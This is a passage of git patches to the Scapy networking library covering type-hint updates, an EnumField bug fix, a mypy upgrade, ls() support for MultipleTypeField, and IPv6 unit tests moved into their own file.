scapy.base_classes import BasePacket, Gen, SetGen, Packet_metaclass, \ @@ -100,7 +111,7 @@ class Packet(six.with_metaclass(Packet_metaclass, # type: ignore "wirelen", ] name = None - fields_desc = [] # type: List[Field[Any, Any]] + fields_desc = [] # type: List[AnyField] deprecated_fields = {} # type: Dict[str, Tuple[str, str]] overload_fields = {} # type: Dict[Type[Packet], Dict[str, Any]] payload_guess = [] # type: List[Tuple[Dict[str, Any], Type[Packet]]] @@ -111,7 +122,7 @@ class Packet(six.with_metaclass(Packet_metaclass, # type: ignore class_packetfields = {} # type: Dict[Type[Packet], Any] class_default_fields = {} # type: Dict[Type[Packet], Dict[str, Any]] class_default_fields_ref = {} # type: Dict[Type[Packet], List[str]] - class_fieldtype = {} # type: Dict[Type[Packet], Dict[str, Field[Any, Any]]] # noqa: E501 + class_fieldtype = {} # type: Dict[Type[Packet], Dict[str, AnyField]] # noqa: E501 @classmethod def from_hexcap(cls): @@ -147,8 +158,8 @@ def __init__(self, self.overload_fields = self._overload_fields self.overloaded_fields = {} # type: Dict[str, Any] self.fields = {} # type: Dict[str, Any] - self.fieldtype = {} # type: Dict[str, Field[Any, Any]] - self.packetfields = [] # type: List[Field[Any, Any]] + self.fieldtype = {} # type: Dict[str, AnyField] + self.packetfields = [] # type: List[AnyField] self.payload = NoPayload() self.init_fields() self.underlayer = _underlayer @@ -245,7 +256,7 @@ def init_fields(self): self.do_init_cached_fields() def do_init_fields(self, - flist, # type: List[Field[Any, Any]] + flist, # type: List[AnyField] ): # type: (...) -> None """ @@ -290,7 +301,7 @@ def do_init_cached_fields(self): self.fields[fname] = value[:] def prepare_cached_fields(self, flist): - # type: (List[Field[Any, Any]]) -> None + # type: (List[AnyField]) -> None """ Prepare the cached fields of the fields_desc dict """ @@ -343,7 +354,7 @@ def post_dissection(self, pkt): pass def get_field(self, fld): - # type: (str) -> Field[Any, Any] + # type: (str) -> AnyField """DEV: returns the field instance from the name of the field""" return self.fieldtype[fld] @@ -423,7 +434,7 @@ def getfieldval(self, attr): return self.payload.getfieldval(attr) def getfield_and_val(self, attr): - # type: (str) -> Tuple[Any, Any] + # type: (str) -> Tuple[AnyField, Any] if self.deprecated_fields and attr in self.deprecated_fields: attr = self._resolve_alias(attr) if attr in self.fields: @@ -2310,7 +2321,7 @@ def explore(layer=None): def _pkt_ls(obj, # type: Union[Packet, Type[Packet]] verbose=False, # type: bool ): - # type: (...) -> List[Tuple[str, Type[Field[Any, Any]], str, str, List[str]]] # noqa: E501 + # type: (...) -> List[Tuple[str, Type[AnyField], str, str, List[str]]] # noqa: E501 """Internal function used to resolve `fields_desc` to display it. :param obj: a packet object or class @@ -2327,8 +2338,8 @@ def _pkt_ls(obj, # type: Union[Packet, Type[Packet]] long_attrs = [] # type: List[str] while isinstance(cur_fld, (Emph, ConditionalField)): if isinstance(cur_fld, ConditionalField): - attrs.append(cur_fld.__class__.__name__[:4]) # type: ignore - cur_fld = cur_fld.fld # type: ignore + attrs.append(cur_fld.__class__.__name__[:4]) + cur_fld = cur_fld.fld if verbose and isinstance(cur_fld, EnumField) \ and hasattr(cur_fld, "i2s"): if len(cur_fld.i2s or []) < 50: From c5284775fa929fb04729396b75eaa72875a3b42a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 17 Nov 2020 09:26:21 +0100 Subject: [PATCH 0399/1632] Fix bug introduced by commit f04b0ae1a Somehow new enumerator values were not loaded into EnumFields because this `if` statement failed. --- scapy/fields.py | 4 ++-- test/contrib/automotive/uds.uts | 24 ++++++++++++++++++++++++ 2 files changed, 26 insertions(+), 2 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index f625b0b55de..1d9568de8d9 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2314,7 +2314,7 @@ def notify_set(self, enum, key, value): log_runtime.debug( "At %s: Change to %s at " + ks, self, value, key ) - if self.i2s and self.s2i: + if self.i2s is not None and self.s2i is not None: self.i2s[key] = value self.s2i[value] = key @@ -2322,7 +2322,7 @@ def notify_del(self, enum, key): # type: (ObservableDict, I) -> None ks = "0x%x" if isinstance(key, int) else "%s" log_runtime.debug("At %s: Delete value at " + ks, self, key) - if self.i2s and self.s2i: + if self.i2s is not None and self.s2i is not None: value = self.i2s[key] del self.i2s[key] del self.s2i[value] diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 9105c0bd54b..cae39d2ea8f 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -382,6 +382,30 @@ assert rdbi.identifiers[0] == 0x0102 assert rdbi.identifiers[1] == 0x0304 assert raw(rdbi) == b'\x22\x01\x02\x03\x04' += Test observable dict used in UDS_RDBI, setter + +UDS_RDBI.dataIdentifiers[0x102] = "turbo" +UDS_RDBI.dataIdentifiers[0x103] = "fullspeed" + +rdbi = UDS()/UDS_RDBI(identifiers=[0x102, 0x103]) + +assert "turbo" in plain_str(repr(rdbi)) +assert "fullspeed" in plain_str(repr(rdbi)) + += Test observable dict used in UDS_RDBI, deleter + +UDS_RDBI.dataIdentifiers[0x102] = "turbo" + +rdbi = UDS()/UDS_RDBI(identifiers=[0x102, 0x103]) +assert "turbo" in plain_str(repr(rdbi)) + +del UDS_RDBI.dataIdentifiers[0x102] +UDS_RDBI.dataIdentifiers[0x103] = "slowspeed" + +rdbi = UDS()/UDS_RDBI(identifiers=[0x102, 0x103]) + +assert "turbo" not in plain_str(repr(rdbi)) +assert "slowspeed" in plain_str(repr(rdbi)) = Check UDS_RDBIPR From 575ae48105a34c9762f22fe66dd47b8d2c9606d4 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 29 Oct 2020 17:34:45 +0100 Subject: [PATCH 0400/1632] Upgrade to mypy 0.790 --- .github/workflows/unittests.yml | 2 +- scapy/compat.py | 2 +- scapy/layers/can.py | 18 +++++++++--------- scapy/main.py | 6 +++--- tox.ini | 2 +- 5 files changed, 15 insertions(+), 15 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index fb8b072cc1a..5336c627fdd 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -44,7 +44,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v2 with: - python-version: 3.9 + python-version: 3.8 - name: Install tox run: pip install tox - name: Run mypy diff --git a/scapy/compat.py b/scapy/compat.py index 14428b084bf..a8b6d60aeed 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -156,7 +156,7 @@ def cast(_type, obj): # type: ignore Set = _FakeType("Set", set) # type: ignore Tuple = _FakeType("Tuple") Type = _FakeType("Type", type) - TypeVar = _FakeType("TypeVar") + TypeVar = _FakeType("TypeVar") # type: ignore Union = _FakeType("Union") class Sized(object): # type: ignore diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 35caa696b01..093c590a0e5 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -28,6 +28,7 @@ from scapy.error import Scapy_Exception from scapy.plist import PacketList from scapy.supersocket import SuperSocket +from scapy.utils import _ByteStream __all__ = ["CAN", "SignalPacket", "SignalField", "LESignedSignalField", "LEUnsignedSignalField", "LEFloatSignalField", "BEFloatSignalField", @@ -380,21 +381,20 @@ def __iter__(self): @staticmethod def open(filename): - # type: (Union[IO[Any], str]) -> Tuple[str, IO[Any]] + # type: (Union[IO[bytes], str]) -> Tuple[str, _ByteStream] """Open (if necessary) filename.""" - if isinstance(filename, six.string_types): - filename = cast(str, filename) + if isinstance(filename, str): try: - fdesc = gzip.open(filename, "rb") + fdesc = gzip.open(filename, "rb") # type: _ByteStream # try read to cause exception fdesc.read(1) fdesc.seek(0) except IOError: fdesc = open(filename, "rb") + return filename, fdesc else: - fdesc = cast(IO[Any], filename) - filename = getattr(fdesc, "name", "No name") - return cast(str, filename), fdesc + name = getattr(filename, "name", "No name") + return name, filename def next(self): # type: () -> Packet @@ -424,10 +424,10 @@ def read_packet(self, size=MTU): is_log_file_format = orb(line[0]) == orb(b"(") if is_log_file_format: - t, intf, f = line.split() + t_b, intf, f = line.split() idn, data = f.split(b'#') le = None - t = float(t[1:-1]) + t = float(t_b[1:-1]) # type: Optional[float] else: h, data = line.split(b']') intf, idn, le = h.split() diff --git a/scapy/main.py b/scapy/main.py index 8b6ece823ff..1ac67f3055b 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -225,7 +225,7 @@ def list_contrib(name=None, # type: Optional[str] ret=False, # type: bool _debug=False # type: bool ): - # type: (...) -> Optional[List[Dict[str, Union[str, None]]]] + # type: (...) -> Optional[List[Dict[str, str]]] """Show the list of all existing contribs. :param name: filter to search the contribs @@ -244,7 +244,7 @@ def list_contrib(name=None, # type: Optional[str] name = "*.py" elif "*" not in name and "?" not in name and not name.endswith(".py"): name += ".py" - results = [] # type: List[Dict[str, Union[str, None]]] + results = [] # type: List[Dict[str, str]] dir_path = os.path.join(os.path.dirname(__file__), "contrib") if sys.version_info >= (3, 5): name = os.path.join(dir_path, "**", name) @@ -258,7 +258,7 @@ def list_contrib(name=None, # type: Optional[str] continue if mod.endswith(".py"): mod = mod[:-3] - desc = {"description": None, "status": None, "name": mod} + desc = {"description": "", "status": "", "name": mod} with io.open(f, errors="replace") as fd: for line in fd: if line[0] != "#": diff --git a/tox.ini b/tox.ini index 0dd00ef4439..6cddece7f94 100644 --- a/tox.ini +++ b/tox.ini @@ -81,7 +81,7 @@ commands = [testenv:mypy] description = "Check Scapy compliance against static typing" skip_install = true -deps = mypy==0.782 +deps = mypy==0.790 typing commands = python .config/mypy/mypy_check.py From 98415aa628b3d1619c54e918d601f981363e9b79 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 2 Nov 2020 16:22:31 +0100 Subject: [PATCH 0401/1632] Add MultipleTypeField support to ls() --- scapy/packet.py | 13 +++++++++++-- test/regression.uts | 11 +++++++++++ 2 files changed, 22 insertions(+), 2 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index fea82c30bda..8a96d4b4c90 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -2340,6 +2340,8 @@ def _pkt_ls(obj, # type: Union[Packet, Type[Packet]] if isinstance(cur_fld, ConditionalField): attrs.append(cur_fld.__class__.__name__[:4]) cur_fld = cur_fld.fld + name = cur_fld.name + default = cur_fld.default if verbose and isinstance(cur_fld, EnumField) \ and hasattr(cur_fld, "i2s"): if len(cur_fld.i2s or []) < 50: @@ -2368,6 +2370,13 @@ def _pkt_ls(obj, # type: Union[Packet, Type[Packet]] elif verbose and isinstance(cur_fld, FlagsField): names = cur_fld.names long_attrs.append(", ".join(names)) + elif isinstance(cur_fld, MultipleTypeField): + default = cur_fld.dflt.default + attrs.append(", ".join( + x[0].__class__.__name__ for x in + itertools.chain(cur_fld.flds, [(cur_fld.dflt,)]) + )) + cls = cur_fld.__class__ class_name_extras = "(%s)" % ( ", ".join(attrs) @@ -2378,10 +2387,10 @@ def _pkt_ls(obj, # type: Union[Packet, Type[Packet]] "s" if cur_fld.size > 1 else "" ) fields.append( - (f.name, + (name, cls, class_name_extras, - repr(f.default), + repr(default), long_attrs) ) return fields diff --git a/test/regression.uts b/test/regression.uts index 77d626887be..74b4d714acb 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -58,6 +58,17 @@ with ContextManagerCaptureOutput() as cmco: assert all("IP" in x for x in result_ls if x.strip()) assert len(result_ls) >= 3 += List packet fields - ls +~ command + +with ContextManagerCaptureOutput() as cmco: + ls(ARP(hwsrc="aa:aa:aa:aa:aa:aa", psrc="1.1.1.1")) + result_ls = cmco.get_output().split("\n") + +result_ls +assert result_ls[5] == "hwsrc : MultipleTypeField (SourceMACField, StrFixedLenField) = 'aa:aa:aa:aa:aa:aa' ('None')" +assert result_ls[6] == "psrc : MultipleTypeField (SourceIPField, SourceIP6Field, StrFixedLenField) = '1.1.1.1' ('None')" + = List commands ~ conf command lsc() From 73a0c3b76278aeac8bfd2337703ce81ab166b66b Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 17 Nov 2020 22:38:59 +0100 Subject: [PATCH 0402/1632] Standalone IPv6 unit tests (#2947) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Standalone IPv6 unit tests Co-authored-by: Phil Co-authored-by: Gabriel Co-authored-by: Pierre LALET Co-authored-by: Harald Albrecht Co-authored-by: Michał Mirosław Co-authored-by: Mathieu Xhonneux * IPv6 unit tests updated Co-authored-by: Phil Co-authored-by: Gabriel Co-authored-by: Pierre LALET Co-authored-by: Harald Albrecht Co-authored-by: Michał Mirosław Co-authored-by: Mathieu Xhonneux --- test/regression.uts | 2862 ---------------------------------- test/scapy/layers/inet6.uts | 2867 +++++++++++++++++++++++++++++++++++ 2 files changed, 2867 insertions(+), 2862 deletions(-) create mode 100644 test/scapy/layers/inet6.uts diff --git a/test/regression.uts b/test/regression.uts index 74b4d714acb..3a0730e374e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1891,1941 +1891,6 @@ assert(q[IPOption_LSRR].get_current_router() == "1.2.3.4") assert(q[IPOption_Security].transmission_control_code == b"XYZ") assert(q[TCP].flags == 2) -# Scapy6 Regression Test Campaign - -############ -############ -+ Test IPv6 Class -= IPv6 Class basic Instantiation -a=IPv6() - -= IPv6 Class basic build (default values) -raw(IPv6()) == b'`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= IPv6 Class basic dissection (default values) -a=IPv6(raw(IPv6())) -a.version == 6 and a.tc == 0 and a.fl == 0 and a.plen == 0 and a.nh == 59 and a.hlim ==64 and a.src == "::1" and a.dst == "::1" - -= IPv6 Class with basic TCP stacked - build -raw(IPv6()/TCP()) == b'`\x00\x00\x00\x00\x14\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00' - -= IPv6 Class with basic TCP stacked - dissection -a=IPv6(raw(IPv6()/TCP())) -a.nh == 6 and a.plen == 20 and isinstance(a.payload, TCP) and a.payload.chksum == 0x8f7d - -= IPv6 Class with TCP and TCP data - build -raw(IPv6()/TCP()/Raw(load="somedata")) == b'`\x00\x00\x00\x00\x1c\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xd5\xdd\x00\x00somedata' - -= IPv6 Class with TCP and TCP data - dissection -a=IPv6(raw(IPv6()/TCP(dport=1234, sport=1234)/Raw(load="somedata"))) -a.nh == 6 and a.plen == 28 and isinstance(a.payload, TCP) and a.payload.chksum == 0xcc9d and isinstance(a.payload.payload, Raw) and a[Raw].load == b"somedata" - -= IPv6 Class binding with Ethernet - build -raw(Ether(src="00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")/IPv6()/TCP()) == b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x86\xdd`\x00\x00\x00\x00\x14\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00' - -= IPv6 Class binding with Ethernet - dissection -a=Ether(raw(Ether()/IPv6()/TCP())) -a.type == 0x86dd - -= IPv6 Class - summary -a = Ether(src="aa:aa:aa:aa:aa:aa", dst="bb:bb:bb:bb:bb:bb")/IPv6(src='c266:a92d:0ed8:dc54:7d6f:9667:3743:a32f', dst='6406:c31f:d0b5:72fc:1700:2081:62e7:fae9') -assert a.summary() == 'Ether / c266:a92d:ed8:dc54:7d6f:9667:3743:a32f > 6406:c31f:d0b5:72fc:1700:2081:62e7:fae9 (59)' - -= IPv6 Class binding with GRE - build -s = raw(IP(src="127.0.0.1")/GRE()/Ether(dst="ff:ff:ff:ff:ff:ff", src="00:00:00:00:00:00")/IP()/GRE()/IPv6(src="::1")) -s == b'E\x00\x00f\x00\x01\x00\x00@/|f\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00eX\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00@\x00\x01\x00\x00@/|\x8c\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x86\xdd`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= IPv6 Class binding with GRE - dissection -p = IP(s) -GRE in p and p[GRE:1].proto == 0x6558 and p[GRE:2].proto == 0x86DD and IPv6 in p - -= IPv6 ma_addr coverage on hashret -IPv6(dst="ff00::1:ff28:9c5a", src="::").hashret() == b';' - -########### IPv6ExtHdrRouting Class ########################### - -= IPv6ExtHdrRouting Class - No address - build -raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=[])/TCP(dport=80)) ==b'`\x00\x00\x00\x00\x1c+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xa5&\x00\x00' - -= IPv6ExtHdrRouting Class - One address - build -raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=["2022::deca"])/TCP(dport=80)) == b'`\x00\x00\x00\x00,+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x02\x00\x01\x00\x00\x00\x00 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91\x7f\x00\x00' - -= IPv6ExtHdrRouting Class - Multiple Addresses - build -raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=["2001::deca", "2022::deca"])/TCP(dport=80)) == b'`\x00\x00\x00\x00<+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x04\x00\x02\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91\x7f\x00\x00' - -= IPv6ExtHdrRouting Class - Specific segleft (2->1) - build -raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=["2001::deca", "2022::deca"], segleft=1)/TCP(dport=80)) == b'`\x00\x00\x00\x00<+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x04\x00\x01\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91\x7f\x00\x00' - -= IPv6ExtHdrRouting Class - Specific segleft (2->0) - build -raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=["2001::deca", "2022::deca"], segleft=0)/TCP(dport=80)) == b'`\x00\x00\x00\x00<+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x04\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xa5&\x00\x00' - -########### IPv6ExtHdrSegmentRouting Class ########################### - -= IPv6ExtHdrSegmentRouting Class - default - build & dissect -s = raw(IPv6()/IPv6ExtHdrSegmentRouting()/UDP()) -assert(s == b'`\x00\x00\x00\x00 +@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x02\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x005\x005\x00\x08\xffr') - -p = IPv6(s) -assert(UDP in p and IPv6ExtHdrSegmentRouting in p) -assert(p[IPv6ExtHdrSegmentRouting].lastentry == 0 and len(p[IPv6ExtHdrSegmentRouting].addresses) == 1 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 0) - -= IPv6ExtHdrSegmentRouting Class - addresses list - build & dissect - -s = raw(IPv6()/IPv6ExtHdrSegmentRouting(addresses=["::1", "::2", "::3"])/UDP()) -assert(s == b'`\x00\x00\x00\x00@+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x06\x04\x02\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x005\x005\x00\x08\xffr') - -p = IPv6(s) -assert(UDP in p and IPv6ExtHdrSegmentRouting in p) -assert(p[IPv6ExtHdrSegmentRouting].lastentry == 2 and len(p[IPv6ExtHdrSegmentRouting].addresses) == 3 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 0) - -= IPv6ExtHdrSegmentRouting Class - TLVs list - build & dissect - -s = raw(IPv6()/IPv6ExtHdrSegmentRouting(tlv_objects=[IPv6ExtHdrSegmentRoutingTLV()])/TCP()) -assert(s == b'`\x00\x00\x00\x004+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x04\x02\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00') - -p = IPv6(s) -assert(TCP in p and IPv6ExtHdrSegmentRouting in p) -assert(p[IPv6ExtHdrSegmentRouting].lastentry == 0) -assert(len(p[IPv6ExtHdrSegmentRouting].addresses) == 1 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 2) -assert(isinstance(p[IPv6ExtHdrSegmentRouting].tlv_objects[1], IPv6ExtHdrSegmentRoutingTLVPadding)) - -= IPv6ExtHdrSegmentRouting Class - both lists - build & dissect - -s = raw(IPv6()/IPv6ExtHdrSegmentRouting(addresses=["::1", "::2", "::3"], tlv_objects=[IPv6ExtHdrSegmentRoutingTLVIngressNode(),IPv6ExtHdrSegmentRoutingTLVEgressNode()])/ICMPv6EchoRequest()) -assert(s == b'`\x00\x00\x00\x00h+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x0b\x04\x02\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x01\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x80\x00\x7f\xbb\x00\x00\x00\x00') - -p = IPv6(s) -assert(p[IPv6ExtHdrSegmentRouting].lastentry == 2) -assert(ICMPv6EchoRequest in p and IPv6ExtHdrSegmentRouting in p) -assert(len(p[IPv6ExtHdrSegmentRouting].addresses) == 3 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 2) - -= IPv6ExtHdrSegmentRouting Class - UDP pseudo-header checksum - build & dissect - -s= raw(IPv6(src="fc00::1", dst="fd00::42")/IPv6ExtHdrSegmentRouting(addresses=["fd00::42", "fc13::1337"][::-1], segleft=1, lastentry=1) / UDP(sport=11000, dport=4242) / Raw('foobar')) -assert(s == b'`\x00\x00\x00\x006+@\xfc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\x11\x04\x04\x01\x01\x00\x00\x00\xfc\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x137\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B*\xf8\x10\x92\x00\x0e\x81\xb7foobar') - - -############ -############ -+ Test in6_get6to4Prefix() - -= Test in6_get6to4Prefix() - 0.0.0.0 address -in6_get6to4Prefix("0.0.0.0") == "2002::" - -= Test in6_get6to4Prefix() - 255.255.255.255 address -in6_get6to4Prefix("255.255.255.255") == "2002:ffff:ffff::" - -= Test in6_get6to4Prefix() - 1.1.1.1 address -in6_get6to4Prefix("1.1.1.1") == "2002:101:101::" - -= Test in6_get6to4Prefix() - invalid address -in6_get6to4Prefix("somebadrawing") is None - - -############ -############ -+ Test in6_6to4ExtractAddr() - -= Test in6_6to4ExtractAddr() - 2002:: address -in6_6to4ExtractAddr("2002::") == "0.0.0.0" - -= Test in6_6to4ExtractAddr() - 255.255.255.255 address -in6_6to4ExtractAddr("2002:ffff:ffff::") == "255.255.255.255" - -= Test in6_6to4ExtractAddr() - "2002:101:101::" address -in6_6to4ExtractAddr("2002:101:101::") == "1.1.1.1" - -= Test in6_6to4ExtractAddr() - invalid address -in6_6to4ExtractAddr("somebadrawing") is None - - -########### RFC 4489 - Link-Scoped IPv6 Multicast address ########### - -= in6_getLinkScopedMcastAddr() : default generation -a = in6_getLinkScopedMcastAddr(addr="FE80::") -a == 'ff32:ff::' - -= in6_getLinkScopedMcastAddr() : different valid scope values -a = in6_getLinkScopedMcastAddr(addr="FE80::", scope=0) -b = in6_getLinkScopedMcastAddr(addr="FE80::", scope=1) -c = in6_getLinkScopedMcastAddr(addr="FE80::", scope=2) -d = in6_getLinkScopedMcastAddr(addr="FE80::", scope=3) -a == 'ff30:ff::' and b == 'ff31:ff::' and c == 'ff32:ff::' and d is None - -= in6_getLinkScopedMcastAddr() : grpid in different formats -a = in6_getLinkScopedMcastAddr(addr="FE80::A12:34FF:FE56:7890", grpid=b"\x12\x34\x56\x78") -b = in6_getLinkScopedMcastAddr(addr="FE80::A12:34FF:FE56:7890", grpid="12345678") -c = in6_getLinkScopedMcastAddr(addr="FE80::A12:34FF:FE56:7890", grpid=305419896) -a == b and b == c - - -########### ethernet address to iface ID conversion ################# - -= in6_mactoifaceid() conversion function (test 1) -in6_mactoifaceid("FD:00:00:00:00:00", ulbit=0) == 'FD00:00FF:FE00:0000' - -= in6_mactoifaceid() conversion function (test 2) -in6_mactoifaceid("FD:00:00:00:00:00", ulbit=1) == 'FF00:00FF:FE00:0000' - -= in6_mactoifaceid() conversion function (test 3) -in6_mactoifaceid("FD:00:00:00:00:00") == 'FF00:00FF:FE00:0000' - -= in6_mactoifaceid() conversion function (test 4) -in6_mactoifaceid("FF:00:00:00:00:00") == 'FD00:00FF:FE00:0000' - -= in6_mactoifaceid() conversion function (test 5) -in6_mactoifaceid("FF:00:00:00:00:00", ulbit=1) == 'FF00:00FF:FE00:0000' - -= in6_mactoifaceid() conversion function (test 6) -in6_mactoifaceid("FF:00:00:00:00:00", ulbit=0) == 'FD00:00FF:FE00:0000' - -########### iface ID conversion ################# - -= in6_mactoifaceid() conversion function (test 1) -in6_ifaceidtomac(in6_mactoifaceid("FD:00:00:00:00:00", ulbit=0)) == 'ff:00:00:00:00:00' - -= in6_mactoifaceid() conversion function (test 2) -in6_ifaceidtomac(in6_mactoifaceid("FD:00:00:00:00:00", ulbit=1)) == 'fd:00:00:00:00:00' - -= in6_mactoifaceid() conversion function (test 3) -in6_ifaceidtomac(in6_mactoifaceid("FD:00:00:00:00:00")) == 'fd:00:00:00:00:00' - -= in6_mactoifaceid() conversion function (test 4) -in6_ifaceidtomac(in6_mactoifaceid("FF:00:00:00:00:00")) == 'ff:00:00:00:00:00' - -= in6_mactoifaceid() conversion function 